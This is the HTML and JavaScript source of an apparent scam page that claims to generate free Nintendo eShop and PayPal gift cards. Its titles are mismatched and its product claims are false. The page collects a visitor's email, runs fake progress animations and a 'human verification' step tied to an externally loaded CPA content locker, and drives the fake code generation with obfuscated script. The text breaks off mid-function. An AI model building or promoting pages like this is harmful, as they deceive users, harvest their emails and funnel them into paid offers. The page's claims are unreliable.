



<!DOCTYPE html>

<html><head>
    <title> Nintendo Eshop Gift Card Generator 2024 </title>
<meta name="description" content="nintendo eshop gift cards are digital vouchers that allow you to add funds to your nintendo eshop account, which can then be used to make purchases online or in stores. You can use nintendo eshop to pay for goods and services from millions of merchants worldwide, including top brands like Amazon, eBay, Target, and Walmart."/>
<meta property="og:title" content="Paypal Money Adder 2024 Free Paypal Money Generator"/>
<meta property="og:description" content="nintendo eshop gift cards are digital vouchers that allow you to add funds to your nintendo eshop account, which can then be used to make purchases online or in stores. You can use nintendo eshop to pay for goods and services from millions of merchants worldwide, including top brands like Amazon, eBay, Target, and Walmart."/>
<meta name="referrer" content="no-referrer">

<!-- Analytics -->

<script
        src="https://browser.sentry-cdn.com/6.4.1/bundle.min.js"
        integrity="sha384-THoc7rflwZFKTdZNgv6jLFFDn299Uv3t1SW5B4yGLvLiCRTYP9ys6vXZcMl95TQF"
        crossorigin="anonymous"
></script>
<script>
    Sentry.init({
        dsn: 'https://e0e6a104cb354a09bf094a90e676ea13@o425163.ingest.sentry.io/5780930',
        tracesSampleRate: 0.01
    });
</script>
<script>
    (function (i, s, o, g, r, a, m) {
        i['GoogleAnalyticsObject'] = r;
        i[r] = i[r] || function () {
            (i[r].q = i[r].q || []).push(arguments)
        }, i[r].l = 1 * new Date();
        a = s.createElement(o), m = s.getElementsByTagName(o)[0];
        a.async = 1;
        a.src = g;
        m.parentNode.insertBefore(a, m)
    })(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');


    
    ga('send', 'pageview');

</script>


    <style>
        .header_blue {
            background: #1565c0;
            padding: 80px 0 20px;
            color: #fff;
            font-size: 48px;
            font-weight: 300;
            margin-bottom: 40px;
        }
        .header_text {
            margin-left: auto;
            margin-right: auto;
            width: 80%;
        }
        body{
            margin:0;
            font-family:Roboto, sans-serif;
            color:#444;
        }
        .unlockBtn:hover{
            box-shadow: 0 3px 6px rgba(0,0,0,.16), 0 3px 6px rgba(0,0,0,.23);
        }
        .unlockBtn {
            background: #e20e2e;
            border: none;
            border-radius: 2px;
            box-shadow: 0 1px 3px rgba(0,0,0,.12), 0 1px 2px rgba(0,0,0,.24);
            min-height: 31px;
            min-width: 70px;
            padding: 2px 16px;
            text-align: center;
            text-shadow: none;
            text-transform: uppercase;
            -webkit-transition: all 280ms ease;
            transition: all 280ms ease;
            box-sizing: border-box;
            cursor: pointer;
            -webkit-appearance: none;
            display: inline-block;
            vertical-align: middle;
            font: 500 14px/31px Roboto,sans-serif!important;
            outline: 0!important;
            color:white;
        }
        .content-container{
            width:80%;margin:0 auto;
        }
        @font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(//fonts.gstatic.com/s/roboto/v15/Pru33qjShpZSmG3z6VYwnRJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(//fonts.gstatic.com/s/roboto/v15/Hgo13k-tfSpn0qi1SFdUfVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(//fonts.gstatic.com/s/roboto/v15/oOeFwZNlrTefzLYmlVV1UBJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(//fonts.gstatic.com/s/roboto/v15/RxZJdnzeo3R5zSexge8UUVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}
        
    </style>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body>

<!DOCTYPE html>
<html><head>
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-153658129-2"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-153658129-2');
</script>

    <title>PayPal Gift Card Giveaway 2024</title>
<meta name="description" content="PayPal Gift Card Generator. PayPal Gift Card Giveaway. PayPal Free Number Card."/>
<meta property="og:title" content="PayPal Gift Card Giveaway"/>
<meta property="og:description" content="PayPal Gift Card Generator. PayPal Gift Card Giveaway. PayPal Free Number Card."/>
<meta name="referrer" content="no-referrer">

<!-- Analytics -->

<script
        src="https://browser.sentry-cdn.com/6.4.1/bundle.min.js"
        integrity="sha384-THoc7rflwZFKTdZNgv6jLFFDn299Uv3t1SW5B4yGLvLiCRTYP9ys6vXZcMl95TQF"
        crossorigin="anonymous"
></script>
<script>
    Sentry.init({
        dsn: 'https://e0e6a104cb354a09bf094a90e676ea13@o425163.ingest.sentry.io/5780930',
        tracesSampleRate: 0.01
    });
</script>
<script>
    (function (i, s, o, g, r, a, m) {
        i['GoogleAnalyticsObject'] = r;
        i[r] = i[r] || function () {
            (i[r].q = i[r].q || []).push(arguments)
        }, i[r].l = 1 * new Date();
        a = s.createElement(o), m = s.getElementsByTagName(o)[0];
        a.async = 1;
        a.src = g;
        m.parentNode.insertBefore(a, m)
    })(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');


    
    ga('send', 'pageview');

</script>


    <style>
        .header_blue {
            background: #1565c0;
            padding: 80px 0 20px;
            color: #fff;
            font-size: 48px;
            font-weight: 300;
            margin-bottom: 40px;
        }
        .header_text {
            margin-left: auto;
            margin-right: auto;
            width: 80%;
        }
        body{
            margin:0;
            font-family:Roboto, sans-serif;
            color:#444;
        }
        .unlockBtn:hover{
            box-shadow: 0 3px 6px rgba(0,0,0,.16), 0 3px 6px rgba(0,0,0,.23);
        }
        .unlockBtn {
            background: #f51414;
            border: none;
            border-radius: 2px;
            box-shadow: 0 1px 3px rgba(0,0,0,.12), 0 1px 2px rgba(0,0,0,.24);
            min-height: 31px;
            min-width: 70px;
            padding: 2px 16px;
            text-align: center;
            text-shadow: none;
            text-transform: uppercase;
            -webkit-transition: all 280ms ease;
            transition: all 280ms ease;
            box-sizing: border-box;
            cursor: pointer;
            -webkit-appearance: none;
            display: inline-block;
            vertical-align: middle;
            font: 500 14px/31px Roboto,sans-serif!important;
            outline: 0!important;
            color:white;
        }
        .content-container{
            width:80%;margin:0 auto;
        }
        @font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(//fonts.gstatic.com/s/roboto/v15/Pru33qjShpZSmG3z6VYwnRJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(//fonts.gstatic.com/s/roboto/v15/Hgo13k-tfSpn0qi1SFdUfVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(//fonts.gstatic.com/s/roboto/v15/oOeFwZNlrTefzLYmlVV1UBJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(//fonts.gstatic.com/s/roboto/v15/RxZJdnzeo3R5zSexge8UUVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}
        
body{

    font-family: 'Inter', sans-serif;
    overflow-y: auto;
    background-image: url(https://d266key948fg17.cloudfront.net/uploads/1660591357d0f7580a0a4a13dde9519a0750c7428b.jpg);
    user-select: none;
}

div{
    display: block;
}

section{
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
    text-align: center;
}

.center{
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
    text-align: center;
    min-height: 90vh;
}

.main{
    text-align: center;
    background: whitesmoke;
    width: 90%;
    max-width:40em;
    justify-content: center;
    align-items: center;
    border-radius: 1em;
    border-color: #f51414;
    border-style: solid;
    border-width: 0.3em;
    box-shadow: 0 0 1em black;
    box-sizing: border-box;
    z-index: 10;
    height: auto;
    margin: 0 0 2em 0;
}

#main0{
    animation: bounce-in 1s ease-in-out;
}

#main3{
    animation: bounce-in 1s ease-in-out;
    margin-top: 5em;
}

.name{
    width: 90%;
}

.mainimg{
    width: 20em;
    position: relative;
    margin: 3em 0 2em 0;
    z-index: 20;
    animation: fade-in 1s ease-in-out;
}

.step0-txt{
    font-weight: 600;
    font-size: 1.6em;
    width: 80%;
    margin: 1em auto;
    color: black;
}

.step1-txt{
    font-weight: 600;
    font-size: 1.6em;
    width: 80%;
    margin: 1em auto;
    color: black;
}

#text-found{
    font-weight: 600;
    font-size: 1.6em;
    width: 80%;
    margin: 1em auto;
}

.user-box{
    overflow: auto;
    position: relative;
}

.user-icon{
    margin-top: 1.1em;
    position: absolute;
    width: 3em;
    z-index: 2;
    margin-left: 1.4em;
}

.user-input{
    position: relative;
    background: #FFFFFF;
    outline: none;
    box-shadow: none;
    width: 15em;
    height: 3em;
    padding: 0 1em 0 2.5em;
    font-size: 1.75em;
    border-radius: 0.6em;
    border-width: 0.15em;
    border-color: #f51414;
    border-style: solid;
    font-weight: bold;
    box-sizing: border-box;
    max-width: 40em;
    vertical-align: middle;
}

.mail-error{
    color: #f51414;
    margin: 0.5em auto 0 auto;
    font-size: 1.2em;
    opacity: 80%;
}

.shakeanim{
    animation: shake 0.3s ease-in-out;
}

@keyframes shake {
    0%, 100% {
        margin-left: 0;
    }
    20%, 80%{
        margin-left: -0.5em;
    }
    40%, 60%{
        margin-left: 0.5em;
    }
}

input, textarea{
    color: black;
}

::placeholder{
    color: black;
    opacity:40%;
}

.btn0 {
    background: #f51414;
    color: white;
    width: 30%;
    padding: 1em 0 1em 0;
    margin: 0 auto;
    margin-top: 1em;
    margin-bottom: 1em;
    border-radius: 0.5em;
    font-weight: 900;
    font-size: 1.5em;
    box-sizing: border-box;
    font-family: "Inter", sans-serif;
}

.btn0:hover{
    background:#f51414;
    transform: scale(1.1);
    cursor: pointer;
    box-shadow: 0 0 0.5em #f51414;
}

#btn1id{
    background-color: #f51414;
}
#btn1id:hover{
    box-shadow: none;
}

.btn1{
    background: #f51414;
    color: white;
    width: 33%;
    padding: 0.5em 0 0.5em 0;
    margin: 1.2em auto 1.5em auto;
    border-radius: 0.5em;
    font-weight: 600;
    font-size: 1.5em;
    box-sizing: border-box;
    font-family: "Inter", sans-serif;
    animation: zoom-in-zoom-out 1s ease infinite;
}

.btn1:hover{
    background:whitesmoke;
    color: #f51414;
    transform: scale(1.1);
    cursor: pointer;
    box-shadow: 0 0 0.5em #f51414;
}

@keyframes zoom-in-zoom-out {
    0% {
        transform: scale(1, 1);
    }
    50% {
        transform: scale(1.1, 1.1);
    }
    100% {
        transform: scale(1, 1);
    }
}

.devices{
    display: flex;
    justify-content: center;
    margin-top: 1em;
    box-sizing: border-box;
    cursor: pointer;
    float: none;
    margin-bottom: 2em;
}

.search1{
    margin: 2em auto;
    text-align: center;
    width: 100%;
    height: 100%;
}

.laststep{
    position: relative;
    text-align: center;
    height: 100%;
    margin-top: 2em;
    margin-bottom: 1.2em;
    font-family: 'Inter', sans-serif;
}

.searching{
    width: fit-content;
    background: #FFFFFF;
    margin: 0 auto;
    border-radius: 1em;
    padding:0.5em;
    font-size: 1.2em;
    box-shadow: 0 0 0.6em black;
}

.searchingname{
    margin: 0 1.5em;
}

#dots:after {
    content: '.';
    animation: dots 1s steps(5, end) infinite;}

@keyframes dots {
    0%, 20% {
        color: rgba(0,0,0,0);
        text-shadow:
                .25em 0 0 rgba(0,0,0,0),
                .5em 0 0 rgba(0,0,0,0);}
    40% {
        color: black;
        text-shadow:
                .25em 0 0 rgba(0,0,0,0),
                .5em 0 0 rgba(0,0,0,0);}
    60% {
        text-shadow:
                .25em 0 0 black,
                .5em 0 0 rgba(0,0,0,0);}
    80%, 100% {
        text-shadow:
                .25em 0 0 black,
                .5em 0 0 black;}}


.checkmark-icon{
    width: 1em;
    float: right;
    margin-left: -1em;
    margin-top: -1.2em;
}

.devices-pic{
    width: 3em;
    margin-top: 0.7em;
}

.devices-pic.ios{
    margin-top: 0.5em;
}

.secondimg{
    float:right;
    width: 15em;
    margin-top: 6.5em;
    margin-right: 5em;
}

.VBucks-Div{
    margin: 0.5em 0 3em 0;
    cursor: pointer;
}

.VBucks-pic{
    width: 14em;
}

.vbucks-text{
    font-size: 1.8em;
    font-weight: 800;
    margin-left:0.5em;
}

.VBucks{
    /* background: #FFFFFF;
    box-shadow: 0 0 0.6em black; */
    margin: 0 1em;
    display: inline-block;
    box-sizing: border-box;
    position: relative;
    max-width: 40em;
    height: 10em;
    align-items: center;
    justify-content: center;
}

.VBucks:hover{
    transform: scale(1.2);
    /*  background:#FFFFFF; */
    /* box-shadow: 0 0 0.5em #35b9fa; */
}

#VBucks0{
    animation: bounce-in 1s ease-in-out;
}

#VBucks1{
    animation: bounce-in 1s ease-in-out;
}

#VBucks2{
    animation: bounce-in 1s ease-in-out;
}

.Selected{
    /* background: #35b9fa;
    box-shadow: 0 0 0.5em #35b9fa; */
    margin: 0 0.5em;
    display: flex;
    flex-direction: column;
    box-sizing: border-box;
    position: relative;
    max-width: 40em;
    height: 10em;
    align-items: center;
    justify-content: center;
    transform: scale(1.3);
}

.progress-bg{
    margin-top: 0.5em;
    width: 26em;
    height: 1em;
    background-color: whitesmoke;
    border-radius: 0.5em;
    display: inline-block;
}
.progress-bar{
    margin-top: 0;
    margin-left: -0.1em;
    width: 0;
    height: 1em;
    background:#f51414;
    border-radius: 0.5em;
}
.progressbar25{
    animation: progress1 1s  linear;
    animation-fill-mode: forwards;
}
@keyframes progress1{
    0%  {width: 0;}
    100%  {width: 25%;}
}
.progressbar40{
    animation: progress2 2s  linear;
    animation-fill-mode: forwards;
}
@keyframes progress2{
    0%  {width: 25%;}
    100%  {width: 40%;}
}
.progressbar65{
    animation: progress3 1s  linear;
    animation-fill-mode: forwards;
}
@keyframes progress3{
    0%  {width: 40%;}
    100%  {width: 65%;}
}
.progressbar85{
    animation: progress4 1s  linear;
    animation-fill-mode: forwards;
}
@keyframes progress4{
    0%  {width: 65%;}
    100%  {width: 85%;}
}
.progressbar95{
    animation: progress5 1s  linear;
    animation-fill-mode: forwards;
}
@keyframes progress5{
    0%  {width: 85%;}
    100%  {width: 95%;}
}

.settings-rotate{
    animation: ranimation 2s linear infinite;
}

@keyframes ranimation {
    0%  {transform: rotate(0deg);}
    100%  {transform:  rotate(360deg);}
}

.laststep-rotate{
    animation: ranimation 2s linear infinite;
    width: 5em;
    margin-top: -5em;
}

.LastStepTxt {
    font-size: 1.5em;
    font-weight: 700;
    width: 90%;
    margin: 1em auto;
    overflow: hidden;
    text-overflow: ellipsis;
}

.firststep{
    margin: 0 auto;
    position: relative;
}

.gf-image{
    width: 20em;
    margin: 2em 0 0.5em 0em;
}

.code-txt{
    position: absolute;
    color: black;
    justify-content: center;
    align-items: center;
    display: flex;
    margin: -11em auto;
    width: 100%;
    height: 100%;
}

.giftcode-txt-pos{
    display: flex;
    align-items: center;
    margin: 0 -10px;
}

.giftcode-txt-label{
    background: #ededed;
    padding: 10px;
    width: 50%;
    border-radius: 10px;
    border: 2px solid #f51414;
    margin: 1em auto;
}

.giftcode-txt{
    font-size: 24px;
    margin-top: 2px;
    font-weight: bold;
}

.your-code-pos{
    margin-top: -1.5em;
    width: 100%;
}

.your-code{
    position: relative;
    margin: 0 auto;
    display: flex;
    align-items: center;
    justify-content: center;
    background: #f51414;
    color: white;
    width: 200px;
    border-radius: 5px;
    text-transform: uppercase;
    padding: 0.5px;
    font-weight: 600;
    letter-spacing: 1.2px;
    border: black solid .2px;
}

.loading-gif{
    width: 1.5em;
    margin-bottom: -0.2em;
}

.waiting-end{
    color: #f51414;
    font-weight: bold;
    font-size: 20px;
    margin: 1em auto;
}

.dot-pos{
    display: flex;
    justify-content: center;
    align-items: center;
    position: relative;
    padding: 1rem 0 0.2rem 0;
    margin: 0 1.1em 0 0;
    overflow: hidden;
}

.dot-pulse {
    position: relative;
    left: -9999px;
    width: 10px;
    height: 10px;
    border-radius: 5px;
    background-color: #f51414;
    color: #f51414;
    box-shadow: 9999px 0 0 -5px #f51414;
    animation: dotPulse 1.5s infinite linear;
    animation-delay: .25s;
}

.dot-pulse::before, .dot-pulse::after {
    content: '';
    display: inline-block;
    position: absolute;
    top: 0;
    width: 10px;
    height: 10px;
    border-radius: 5px;
    background-color: #f51414;
    color: #f51414;
}

.dot-pulse::before {
    box-shadow: 9984px 0 0 -5px #f51414;
    animation: dotPulseBefore 1.5s infinite linear;
    animation-delay: 0s;
}

.dot-pulse::after {
    box-shadow: 10014px 0 0 -5px #f51414;
    animation: dotPulseAfter 1.5s infinite linear;
    animation-delay: .5s;
}

@keyframes dotPulseBefore {
    0% {
        box-shadow: 9984px 0 0 -5px #f51414;
    }
    30% {
        box-shadow: 9984px 0 0 2px #f51414;
    }
    60%,
    100% {
        box-shadow: 9984px 0 0 -5px #f51414;
    }
}

@keyframes dotPulse {
    0% {
        box-shadow: 9999px 0 0 -5px #f51414;
    }
    30% {
        box-shadow: 9999px 0 0 2px #f51414;
    }
    60%,
    100% {
        box-shadow: 9999px 0 0 -5px #f51414;
    }
}

@keyframes dotPulseAfter {
    0% {
        box-shadow: 10014px 0 0 -5px #f51414;
    }
    30% {
        box-shadow: 10014px 0 0 2px #f51414;
    }
    60%,
    100% {
        box-shadow: 10014px 0 0 -5px #f51414;
    }
}

.users-online{
    color: white;
    font-family: Inter, "sans-serif";
    font-weight: bold;
    animation: gelatine 1s ease-in-out;
}
.linebrake{
    display: none;
}

#users-online{
    color: #cdd2e2;
}

#update{
    color: #cdd2e2;
}

#total{
    color: #cdd2e2;
}

@keyframes bounce-in {
    0% {
        opacity: 0;
        transform: scale(.3);
    }
    50% {
        opacity: 1;
        transform: scale(1.05);
    }
    70% { transform: scale(.9); }
    100% { transform: scale(1); }
}

@keyframes fade-in {
    from { opacity: 0; }
    to { opacity: 1; }
}

@keyframes gelatine {
    from, to { transform: scale(1, 1); }
    25% { transform: scale(0.9, 1.1); }
    50% { transform: scale(1.1, 0.9); }
    75% { transform: scale(0.95, 1.05); }
}

/*              Mobile                 */

@media only screen and (max-width: 768px) {
    .gf-image{
        width: 20em;
    }
    .users-online{
        margin: 1.5em auto;
    }
    .line{
        display: none;
    }
    .linebrake{
        display: block;
    }
    .giftcode-txt-label{
        width: 75%;
    }

    .giftcode-txt{
        font-size: 20px;
        margin-top: 6px;
    }
    .center{
        min-height: 75vh;
    }
    .VBucks{
        display: flex;
        flex-direction: column;
        margin: 10em auto;
    }
    #VBucks0{
        margin-top: 5em;
    }
    #VBucks2{
        margin-bottom: 5em;
    }
    .main{
        margin-top: 0;
    }
    .devices{
        margin: 1em auto;
        display: flex;
        flex-direction: column;
        align-items: center;
        /* position: absolute; */
    }
    .devices-pic{
        width: 2.6em;
        margin: 0 auto;
    }
    .devices-pic.ios{
        margin-top: 0.1em;
    }
    .devices-pic.android{
        margin-top: 0.1em;
    }
    .devices-pic.windows{
        margin-top: 0.2em;
    }
    .secondimg{
        width: 20em;
        margin-top: -1em;
        box-sizing: border-box;
    }
    .Selected{
        margin: 0 1em;

    }
    .VBucks-pic{
        width: 12em;
    }

    .LastStepTxt{
        font-size: 1.2em;
        width: 92%;
    }

    .laststep{
        height: 100%;
    }

    .step0-txt{
        font-size: 1.5em;
        margin-top: 0.8em;
    }
    .step1-txt{
        font-size: 1.2em;
        margin-top: 0.8em;
        width: 95%;
    }
    .progress-bg{
        width: 90%;
    }
    .settings-rotate{
        margin-bottom: 1em;
        margin-top: 0.8em;
    }
    .user-input{
        width: 90%;
    }
    .btn0{
        width: 40%;
    }
    .btn1, .btn3{
        width: 44%;
    }
    .checkmark-icon{
        margin-top: -1.2em;
    }
    .mainimg{
        position: absolute;
        top: 10px;
    }
    #main2{
        margin-top: 11em;
    }
    .main {
        margin-top: 10em;
    }
    #main3{
        margin-top: 4em;
    }
}


@media only screen and (max-width: 319px){
    .user-input{
        font-size: 22px;
        margin: 0 auto;
    }
    .user-icon{
        margin: 0.7em 0.8em;
    }
    .your-code{
        width: 150px;
    }
    .your-code-pos{
        margin-top: -2em;
    }
}

@media only screen and (max-width: 395px){
    .user-input{
        font-size: 22px;
    }
    .user-icon{
        margin: 0.6em 0.6em;
    }
    .mainimg{
        width: 15em;
    }
    .gf-image{
        width: 15em;
    }
    .code-txt{
        text-align: center;
        margin: -9.5em auto;
        font-size: .9em;
    }
}

@media only screen and (max-width: 509px){
    .secondimg{
        display: none;
    }
    .devices{
        margin: 1em auto;
    }
    .btn0{
        width: 50%;
    }
    .btn1, .btn3{
        width: 54%;
    }
    .VBucks{
        display: flex;
        flex-direction: column;
    }

    .Selected{
        display: flex;
        flex-direction: column;
    }
}
/* BG */

body {
    margin: 0;
}

    </style>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta charset="UTF-8">
    <title>PayPal Gift Card Giveaway</title>
    <link rel="stylesheet" href="main.css">
    <script src="script.js" defer></script>
    <link rel="icon" type="image/png" href="https://d266key948fg17.cloudfront.net/uploads/1665052258eafd01a9e0e01046907ede885328cdc2.png">
</head>
<body>
<style>
@import url('https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700;800&family=Kanit:wght@300;400;500;600;700;800&display=swap');
</style>

<div class="center">
    <img src="https://d266key948fg17.cloudfront.net/uploads/1635763684aa2580d503ec4c3469f4712c5955a97f.png" alt="PayPal Logo" class="mainimg" id="mainimg">
    <div id="main2" style="display: 1none;">
        <div class="step0" id="step1" style="display: 1none;">
            <div class="VBucks-Div" id="VBucks-div">
                <div class="VBucks" id="VBucks0" onclick="next(1)">
                    <img src="https://www.pjsgames.com/cdn/shop/files/45-dollar-nintendo-eshop-digital-gift-card_1024x.png" class="VBucks-pic one" id="pic1">
                </div>
                <div class="VBucks" id="VBucks1" onclick="next(2)">
                    <img src="https://www.pjsgames.com/cdn/shop/files/50-dollar-nintendo-eshop-digital-gift-card_1024x.png" class="VBucks-pic two" id="pic2">
                </div>
                <div class="VBucks" id="VBucks2" onclick="next(3)">
                    <img src="https://www.pjsgames.com/cdn/shop/files/70-dollar-nintendo-eshop-digital-gift-card.png" class="VBucks-pic three" id="pic3">
                </div>
				<div class="VBucks" id="VBucks2" onclick="next(4)">
                    <img src="https://www.pjsgames.com/cdn/shop/files/99-nintendo-eshop-digital-gift-card.png" class="VBucks-pic three" id="pic4">
                </div>
            </div>
        </div>
        <div class="users-online">Users Online: <span id="users-online"></span> <br class="linebrake"> <span class="line">|</span> Last Update: <span id="update"></span> <br> Total Gift Cards Generated: <span id="total"></span></div>
    </div>
    <div class="main" id="main0" style="display: none;">
        <div class="step0" id="step0">
            <div class="step0-txt"> Enter Your Email To Claim Your Nintendo eShop Digital Gift Card </div>
            <div class="user-box" id="user-box">
                <img src="https://d266key948fg17.cloudfront.net/uploads/1654521813585ec8b77768eb9dd941e37ad62c311a.png" class="user-icon">
                <input class="user-input" id="input-id" placeholder="Email" onblur="" type="email">
                <p class="mail-error" style="display: none;">Please enter valid email</p>
            </div>
            <div class="btn0" id="btn1id" onclick="GenerateButton()">Proceed</div>
        </div>
    </div>
    <div class="main" id="main4" style="display: none;">
        <div class="search1" id="search1">
            <img src="https://d266key948fg17.cloudfront.net/uploads/1652194594fea7175a707ceefbaa64e6857ffd6767.png" class="settings-rotate" id="settings-rotate">
            <div class="firststep" id="firststep" style="display: none;">
                <img src="https://cdn.pixabay.com/photo/2020/05/15/08/28/switch-5172817_1280.png" class="gf-image">
                <div class="code-txt" id="codegf"></div>
            </div>
            <div class="step1-txt" id="Generating-step0">Getting Ready..</div>
            <div class="progress-bg">
                <div class="progress-bar" id="progress-bar">
                </div>
            </div>
        </div>
    </div>
    <div class="main" id="main3" style="display: none;">
        <div class="laststep" id="laststep" style="display: 1none ;">
            <img src="https://d266key948fg17.cloudfront.net/uploads/1652194619c7feb47a1add45dc53247b16cbcf8ab0.png" class="laststep-rotate">
            <div class="LastStepTxt" id="LastStepTxt">Hello! You are almost there. Please verify that you're human and not an automated bot to unlock the full card number for $<span id="vbucksamount"></span> Gift Card.
                <br> <br> The card number will be sent to your e-mail after the verification. This is done to prevent abuse of our system.
            </div>
            <div class="giftcode-txt-pos">
                <div class="giftcode-txt-label">
                    <div class="your-code-pos">
                        <div class="your-code"> your card number </div>
                    </div>
                    <div id="code" class="giftcode-txt"></div>
                </div>
            </div>
        </div>
        <div class="dot-pos">
            <div class="dot-pulse"></div>
        </div>
        <div class="waiting-end"> Waiting </div>
        <div class="btn1" id="btn2id" onclick="CPABuildLock()"> Verify </div>
    </div>
</div>
</body>
</html>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>

<script type="text/javascript">
    var dztSh_LHT_osCNxc={"it":4365134,"key":"613b3"};
</script>
<script src="https://d1mikxzr3lp4va.cloudfront.net/30523f9.js"></script>
<script type="text/javascript">
    $('.showContentLocker').click(function(){
       CPABuildLock();
        return false;
    });
</script>
<script>

</script>
<script type="text/javascript">
    var _0x1c9df6=_0x2f99;(function(_0x2fdb68,_0x575ccd){var _0x3d9a62=_0x2f99,_0x51a471=_0x2fdb68();while(!![]){try{var _0x3de13e=parseInt(_0x3d9a62(0x77))/0x1*(parseInt(_0x3d9a62(0x6e))/0x2)+parseInt(_0x3d9a62(0x8c))/0x3*(parseInt(_0x3d9a62(0x75))/0x4)+parseInt(_0x3d9a62(0x81))/0x5+parseInt(_0x3d9a62(0x92))/0x6*(parseInt(_0x3d9a62(0x76))/0x7)+parseInt(_0x3d9a62(0x7d))/0x8+parseInt(_0x3d9a62(0x96))/0x9+-parseInt(_0x3d9a62(0x8d))/0xa*(parseInt(_0x3d9a62(0x79))/0xb);if(_0x3de13e===_0x575ccd)break;else _0x51a471['push'](_0x51a471['shift']());}catch(_0x261ef1){_0x51a471['push'](_0x51a471['shift']());}}}(_0x2f65,0xc2b58));var vbucksValue,name;const email=document[_0x1c9df6(0x93)]('.user-input'),error=document['querySelector'](_0x1c9df6(0x8b)),showError=()=>{var _0x52e7d8=_0x1c9df6;error[_0x52e7d8(0x98)][_0x52e7d8(0x7b)]=_0x52e7d8(0x90),setTimeout(function(){var _0x12d582=_0x52e7d8;error[_0x12d582(0x98)][_0x12d582(0x7b)]=_0x12d582(0x89);},0x7d0);};function GenerateButton(){var _0x19fb35=_0x1c9df6,_0x2c6ace=name=document[_0x19fb35(0x71)](_0x19fb35(0x6d))['value'];if(!email['value']['match'](/^([A-Za-z0-9_\-\.])+\@([A-Za-z0-9_\-\.])+\.([A-Za-z]{2,4})$/))return showError();else document[_0x19fb35(0x71)](_0x19fb35(0x6b))[_0x19fb35(0x98)][_0x19fb35(0x7b)]=_0x19fb35(0x89),document[_0x19fb35(0x71)](_0x19fb35(0x6c))[_0x19fb35(0x98)][_0x19fb35(0x7b)]=_0x19fb35(0x89),document[_0x19fb35(0x71)](_0x19fb35(0x9a))['style']['display']='block',setTimeout(function(){var _0xe88b9c=_0x19fb35;document[_0xe88b9c(0x71)](_0xe88b9c(0x91))['classList'][_0xe88b9c(0x74)](_0xe88b9c(0x78)),setTimeout(function(){var _0x56a19b=_0xe88b9c;document['getElementById'](_0x56a19b(0x9b))['innerHTML']=_0x56a19b(0x73),document['getElementById']('progress-bar')[_0x56a19b(0x70)][_0x56a19b(0x74)](_0x56a19b(0x7e)),setTimeout(function(){var _0xbeefa9=_0x56a19b;document[_0xbeefa9(0x71)](_0xbeefa9(0x9b))[_0xbeefa9(0x87)]=_0xbeefa9(0x88),generatecode(),setTimeout(function(){var _0x171990=_0xbeefa9;document[_0x171990(0x71)](_0x171990(0x9b))['innerHTML']=_0x171990(0x99),document['getElementById'](_0x171990(0x91))[_0x171990(0x70)][_0x171990(0x74)](_0x171990(0x86)),setTimeout(function(){var _0x168481=_0x171990;document[_0x168481(0x71)](_0x168481(0x9b))['innerHTML']=_0x168481(0x7a),document['getElementById'](_0x168481(0x91))[_0x168481(0x70)][_0x168481(0x74)](_0x168481(0x9c)),setTimeout(function(){var _0x3795f6=_0x168481;document[_0x3795f6(0x71)]('Generating-step0')[_0x3795f6(0x87)]=_0x3795f6(0x7c),document['getElementById'](_0x3795f6(0x91))[_0x3795f6(0x70)]['add']('progressbar95'),setTimeout(function(){var 